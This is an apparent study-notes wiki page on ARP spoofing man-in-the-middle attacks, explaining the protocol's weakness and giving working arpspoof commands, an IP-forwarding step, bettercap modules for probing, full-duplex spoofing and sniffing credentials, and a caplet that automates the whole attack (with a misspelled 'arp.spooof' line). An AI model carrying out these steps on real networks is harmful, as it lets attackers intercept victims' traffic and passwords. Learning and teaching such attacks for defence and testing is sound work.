====== ARP Spoofing ======

This is a MITM attack...

Test site: http://testphp.vulnweb.com/

===== ARP Tables =====

To check ARP Tables in Windows or Linux: ``arp -a``

If you get too many entries, grep it: 

<code>arp -a | grep ether</code>

----

===== ARP Spoofing Attack =====

**Terms:**
  * __ARP__: Address Resolution Protocol (maps IP to MAC on a network)
  * __ARP Request__: broadcast to the network requesting MAC of specific IP
  * __ARP Response__: client with that IP responds to requester with its MAC address

Each computer on the network has an ARP table linking IPs with MACs. You use this table to exploit the ARP protocol and set up a MITM spoof.
  - You spoof the IP/MAC of the router: sent to victim. Causes the victim to update its ARP table and accociate my MAC with router's IP
  - You spoof the IP/MAC of the victim: sent to router. Causes the router to update its ARP table and associate my MAC with victim's IP

This effectively puts you in the middle, intercepting traffic between victim and router. The victim thinks you are the router; and the router thinks you are the victim. 

**Why ARP Spoofing works:** Because the protocol itself is not secure...
  - Clients accept responses even if they did not send a request.
  - Cients trust responses without any verification.

So we send an ARP Response to a target and that target will not verify the response. The target will simply update its ARP table with the response I sent it. 

**Tools:** arpspoof, bettercap
  * These tools only set up the ARP Spoof and redirect traffic to your computer (the put you as the Man in the Middle).
  * After you set this up, you need to capture and anylize the traffic (with something like Wireshark). 

----

===== arpspoof =====

Syntax (usage is always the same): 

<code>
arpspoof -i [interface] -t [clientIP] [gatewayIP]  # spoofs the client, telling him I am the gateway
arpspoof -i [interface] -t [gatewayIP] [clientIP]  # spoofs the gateway, telling him I am the client
</code>

Example (as root): 

<code>
arpspoof -i eth0 -t 192.168.0.216 192.168.0.1
arpspoof -i eth0 -t 192.168.0.1 192.168.0.216
</code>

NOTE: You need to enable port forwarding to allow packets to flow through your machine just like a router.
  * As root: ''echo 1 > /proc/sys/net/ipv4/ip_forward''

----

===== Bettercap =====

Bettercap can do the same thing as arpspoof and more: [[https://www.bettercap.org/modules/ethernet/|docs]].

Bettercap is a framework to run network attacks: 
  * ARP Spoofing (redirect flow of packets through your machine to analyze, change)
  * Sniff data (urls, usernames, passwords)
  * Bypass HTTPS
  * DNS Spoofing (redirect domain requests)
  * Inject code in loaded pages

**Syntax:** ''bettercap -iface [interface]''

That gets in you into the tool. Type ''help'' to see a menu and the ''help [moduleName]'' to get help on a specific module name you want to use.
  * At the top of the help information you get syntax to turn on/off, etc.
  * Under that you get Parameters (options for the module). To change: 
    * Syntax: ''set [option to modify] [true | false]''
    * Example: ''set arp.spoof.fullduplex true''

**Module: net.probe** (discover connected clients quickly)
  * Turn the module on (at bettercap prompt): ''net.probe on''
  * This will also automatically start the net.recon module (type "help" at prompt to confirm)

**Module: net.recon**
  * net.probe sends probe requests to all possible IPs on the network
  * net.recon monitors ARP cache to take the responses and add them to a list for me to target
  * net.recon has several commands: 
    * net.show: Show cache hosts list (default sorting by ip).

----

===== Bettercap ARP Spoof =====

Module: arp.spoof (for use, at bettercap prompt: "help arp.spoof")
  * You MUST have net.probe and net.recon running for this to work.

1. Turn on net.probe if it's not on already

<code>net.probe on</code>

2. Change module parameter for full duplex (spoof client and router, both):

<code>set arp.spoof.fullduplex true</code>

3. Change module parameter to add your target client IP (because we set the full-duplex parameter, we do not have to set the gateway, only the client; the gateway/router sets automagically): 

<code>
set arp.spoof.targets [target IP]
# or
set arp.spoof.targets [target IP],[target IP],[target IP]
</code>

4. Turn ARP spoofing on (see "help arp.spoof") and that's it.

<code>
arp.spoof on
help #to see the modules running
</code>

NOTE: If you check our arp table in the client you will see the attach machine's MAC associated with the gateway.

5. To sniff the traffic (still using bettercap; later we'll use Wireshark):

<code>
help net.sniff # see the options
net.sniff on
</code>

**Test It:** [[http://testphp.vulnweb.com/|VulnWeb]] (to generate some traffic)

----

===== Bettercap Caplets =====

Caplets are custom scripts for Bettercap (basically text files with commands, one on each line). 

How-To:
  - Create a text file
  - On each line put the commands you always run: 

Example (to do all the above when you start Bettercap): 

<code>
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.0.142
arp.spooof on
net.sniff on
</code>

To run it: 

<code>bettercap -iface [interface name] -caplet /path/to/caplet.cap</code>

----